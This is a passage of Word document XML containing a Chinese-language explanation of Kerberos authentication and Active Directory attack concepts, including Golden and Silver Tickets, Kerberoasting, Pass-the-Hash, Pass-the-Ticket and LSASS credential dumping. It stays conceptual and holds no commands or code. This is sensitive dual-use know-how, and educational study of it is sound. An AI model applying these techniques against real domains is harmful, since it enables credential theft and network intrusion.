        <w:t xml:space="preserve">KRB_AS_REQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。AS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证用户身份后，返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">KRB_AS_REP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其中包含一个会话密钥（加密在用户长期密钥中）和一张</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">票据授予票据（Ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Granting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ticket，TGT）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（加密在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自己的服务密钥</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中）。TGT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包含用户身份、所属组、权限（含特权属性证书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PAC）等信息，有效期通常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小时。此后，客户端不必再发送密码，仅用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即可向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求服务票据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TGS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交换（获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ST）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：客户端向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">KRB_TGS_REQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和一个用会话密钥加密的认证符（authenticator），以及要访问的服务名（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cifs/fileserver.domain.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。KDC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和认证符后，返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">KRB_TGS_REP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，内含一个新会话密钥（加密在之前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段生成的会话密钥中）和一张</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务票据（Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ticket，ST）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（加密在目标服务的长期密钥中）。ST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中同样包含用户身份、PAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交换（使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ST）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：客户端将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和新认证符（用新会话密钥加密）发送至目标服务。服务用自己的密钥解密</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST，取出会话密钥，再验证认证符，确认用户身份后授予访问权限。整个过程用户密码从未在网络上传输，仅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端使用其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行加解密。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一机制的精巧之处在于，票据将身份认证与授权信息打包，由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">集中签发，服务只需拥有自己的密钥即可验证，无需与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实时交互（在票据有效期内）。然而，该设计也引入了新的攻击面：票据本身成为高价值伪造目标，票据中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若被篡改或绕过验证，可导致权限提升。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">票据与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全的相关概念（标①原理，部分标③概念）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">krbtgt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：此账户的密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用于加解密</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TGT，是域中最敏感的秘密。攻击者若能获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> krbtgt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash，即可伪造任意用户、任意权限的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TGT（所谓“黄金票据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Golden </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ticket”），拥有域的无限制访问权限。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务账户与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务必须注册服务主体名称（Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Principal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Name，SPN）后，Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">才能为其发放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST。服务账户通常为域用户或计算机账户，其密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若被离线破解，则可获取该账户的凭据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoasting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者向域内任何用户（即便是无特权用户）都可请求特定服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST，该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用服务账户的密钥加密。攻击者可离线暴力破解服务账户密码。这是典型的基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的凭据窃取技术（标③概念，不提供工具链）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">白银票据（Silver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ticket）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者获取某一服务的长期密钥（通常是计算机账户密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash），即能伪造该服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST，从而冒充任意用户访问该服务。白银票据仅针对单一服务，影响范围有限，但可能用于绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动概念：违反的假设与攻击思路（标③概念，杜绝武器化）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者在获得域内一台主机的控制权后，以此为立足点，利用被控主机的凭据、会话、信任关系，继续探测并渗透到域内其他系统，逐步接近高价值目标（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DC、数据库、备份服务器）。它与“纵向提权”（在单台主机上提高权限）形成对照，是域渗透的核心环节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">违反的假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：正常域设计中，网络边界隔离、各主机仅信任经</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证的身份、凭据（密码/hash）仅在认证时短暂出现在内存中。横向移动滥用了以下假设：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内部网络全互信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：传统防御假设内网安全，域内主机间可自由访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB（445）、RPC（135）、WinRM（5985/5986）等端口，攻击者可充分利用此信任。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">凭据唯一认证属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：操作系统将用户密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存储在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程内存中以支持单点登录，原本设计为“只有合法登录才能获得凭据”。攻击者一旦获得管理员权限，便能从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存导出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash（如通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz，此为概念提及，不教操作），然后利用该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而无需明文密码去认证到其他系统（Pass-the-Hash）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">票据仅由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">签发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：正常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流程中只有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能签发有效票据。但若攻击者获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> krbtgt hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或服务账户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash，即可绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自行伪造黄金/白银票据，破坏了票据的“不可伪造性”假设。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话票据仅对一次登录有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：TGT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在登录会话中缓存，攻击者可从内存中导出这些票据并重用（Pass-the-Ticket），冒充原票据持有者访问资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关键横向移动技术概念（仅阐述原理与违反的假设，③概念）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pass-the-Hash (PtH)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的单点登录机制使得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等效于明文密码（对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证）。攻击者从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中导出某个用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NT hash </w:t>
      </w:r>
      <w:r>
